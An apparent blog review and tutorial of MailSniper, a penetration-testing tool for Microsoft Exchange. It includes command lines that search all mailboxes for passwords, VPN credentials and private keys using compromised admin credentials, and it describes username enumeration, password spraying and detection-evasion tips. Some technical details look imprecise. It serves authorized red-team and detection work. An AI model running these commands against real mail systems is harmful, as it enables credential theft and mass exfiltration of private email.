MailSniper: How Penetration Testers Weaponize Exchange's Own Features Against It

Hook

Microsoft Exchange has a built-in feature that lets administrators read anyone's email across an entire organization—and penetration testers have been using it for years to exfiltrate credentials, intellectual property, and network diagrams hiding in corporate inboxes.

Context

In traditional penetration testing engagements, gaining initial access to a corporate network is only the beginning. Once inside, red teams need to pivot, escalate privileges, and locate sensitive data that demonstrates real business impact. Email systems have always been treasure troves of sensitive information—passwords shared between colleagues, VPN credentials sent by IT departments, architectural diagrams attached to planning emails, and confidential business intelligence discussions. The problem? Manually searching through mailboxes is time-consuming and impractical when you need to sweep thousands of users.

Before MailSniper's release in 2016, penetration testers had limited options for email reconnaissance in Microsoft Exchange environments. They could use native PowerShell cmdlets if they had administrative access, write custom scripts against Exchange Web Services (EWS) APIs, or manually export mailboxes using administrative tools—all approaches that required significant scripting expertise, generated excessive audit logs, or simply took too long during time-boxed engagements. MailSniper consolidated the entire Exchange reconnaissance workflow into a single PowerShell module that handles authentication, mailbox enumeration, permission manipulation, and content searching with simple one-liners. It transformed what used to be a multi-day custom scripting project into a 15-minute operation.

Technical Insight

MailSniper's architecture leverages two core Microsoft technologies: Exchange Web Services (EWS) for mailbox interaction and PowerShell remoting for Exchange management cmdlets. The tool's genius lies in how it weaponizes Exchange's ApplicationImpersonation feature—a legitimate RBAC (Role-Based Access Control) permission designed to let applications act on behalf of users for backup, compliance, or migration scenarios.

The attack flow for organization-wide searching follows this pattern: First, MailSniper uses Invoke-GlobalMailSearch which connects to the Exchange server via PowerShell remoting, grants the compromised account ApplicationImpersonation rights using New-ManagementRoleAssignment, then systematically searches every mailbox accessible through EWS. Here's how you'd search every mailbox in a domain for emails containing "password":

# Import the module
Import-Module .\MailSniper.ps1

# Authenticate and search all mailboxes
Invoke-GlobalMailSearch -ImpersonationAccount current-user@company.com `
  -ExchHostname mail.company.com `
  -AdminUserName "DOMAIN\admin-account" `
  -AdminPassword "CompromisedPassword123!" `
  -Terms "password","credentials","vpn" `
  -OutputCsv results.csv

This single command handles the entire attack chain: establishing a remote PowerShell session to the Exchange server, elevating the ImpersonationAccount's privileges, enumerating all mailboxes via Get-Mailbox, and searching email subjects, bodies, and folder names for the specified terms. The results export to CSV with sender, recipient, subject, and preview text—perfect for quickly triaging thousands of results.

For scenarios where you've compromised a regular user account without administrative Exchange access, MailSniper provides Invoke-SelfSearch which uses EWS authentication directly without requiring privilege escalation:

# Search your own mailbox as a regular user
Invoke-SelfSearch -Mailbox user@company.com `
  -ExchHostname outlook.office365.com `
  -Terms "password","secret","confidential" `
  -Remote

The -Remote flag indicates Office 365, causing MailSniper to use the Outlook Web Access EWS endpoint rather than an on-premises Exchange server. Behind the scenes, this function creates an ExchangeService object from Microsoft's EWS Managed API, authenticates with the provided credentials, and iterates through folder structures using FindFoldersResults and FindItemsResults pagination.

MailSniper's attachment searching capabilities demonstrate more sophisticated EWS manipulation. When you specify -CheckAttachments, the tool downloads each attachment temporarily, extracts text content using COM objects for Office documents or regex for plain text files, searches the extracted content, then deletes the temporary file. This works for .doc, .docx, .pdf, .xls, .txt, .ps1, and other common formats:

Invoke-SelfSearch -Mailbox user@company.com `
  -ExchHostname mail.company.com `
  -Terms "BEGIN RSA PRIVATE KEY","BEGIN OPENSSH PRIVATE KEY" `
  -CheckAttachments

This particular search looks for SSH private keys that users might have emailed themselves—a surprisingly common finding in real penetration tests. The tool's regex engine supports complex patterns, allowing searches for structured data like Social Security numbers, credit card numbers, or API keys following specific formats.

Beyond email searching, MailSniper includes complete pre-authentication reconnaissance modules. Invoke-DomainHarvestOWA performs user enumeration against Outlook Web Access by timing authentication response differences—valid usernames return slower responses than invalid ones. Invoke-PasswordSprayOWA conducts credential stuffing attacks against discovered usernames with a configurable delay to avoid account lockouts. These modules turn MailSniper into a full Exchange attack framework rather than just a post-exploitation search tool.

The implementation uses native .NET classes extensively. For modern authentication against Office 365, MailSniper can consume OAuth access tokens or Azure Primary Refresh Tokens (PRTs) rather than passwords, supporting realistic scenarios where penetration testers have compromised token caches from workstations but don't have plaintext credentials. The authentication flexibility—supporting basic auth, NTLM, OAuth, and even pass-the-hash for Kerberos environments—makes it adaptable to diverse Exchange configurations encountered during real engagements.

Gotcha

MailSniper's most significant limitation is detectability—it's fundamentally loud from a security monitoring perspective. When Invoke-GlobalMailSearch grants ApplicationImpersonation rights, Exchange generates audit log event ID 1 ("New-ManagementRoleAssignment") that mature Security Operations Centers specifically monitor. Even the searching process creates EWS access patterns (one account hitting hundreds of mailboxes in minutes) that deviate dramatically from normal user behavior. Modern EDR solutions flag the PowerShell cmdlets MailSniper uses, and environments with Constrained Language Mode or AMSI integration will block execution entirely.

The tool also requires existing credentials or administrative access, making it purely a post-compromise lateral movement tool rather than an initial access vector. Microsoft's deprecation of Basic Authentication in Exchange Online has broken compatibility with older MailSniper versions, requiring modern authentication updates. In heavily hardened environments with proper PowerShell logging, script execution policies, and Exchange audit monitoring, MailSniper's operational security posture is poor—it prioritizes functionality over stealth. Finally, the ApplicationImpersonation permission requirement means you need either Exchange administrative rights or the ability to execute remote PowerShell commands against Exchange servers, limiting effectiveness if you've only compromised end-user workstations without server access.

Verdict

Use MailSniper if you're conducting authorized red team engagements or penetration tests where you've already compromised domain credentials, need to demonstrate business impact through data exfiltration, and are targeting environments without mature security monitoring. It excels at quickly identifying sensitive information scattered across hundreds of mailboxes—credentials in emails, architectural documentation, intellectual property—that proves real risk to stakeholders. The tool is also valuable for purple team exercises where you specifically want to test your organization's ability to detect ApplicationImpersonation abuse and anomalous EWS access patterns. Skip MailSniper if you need stealthy post-exploitation in environments with robust SOC capabilities, PowerShell execution restrictions, or comprehensive Exchange audit logging—the tool will trigger alerts immediately. Also skip it for initial access scenarios (you need existing credentials first), non-Exchange environments, or situations where you can't afford detection. For those contexts, consider developing custom EWS scripts with lower operation signatures or using native administrative tools that blend with normal administrator behavior.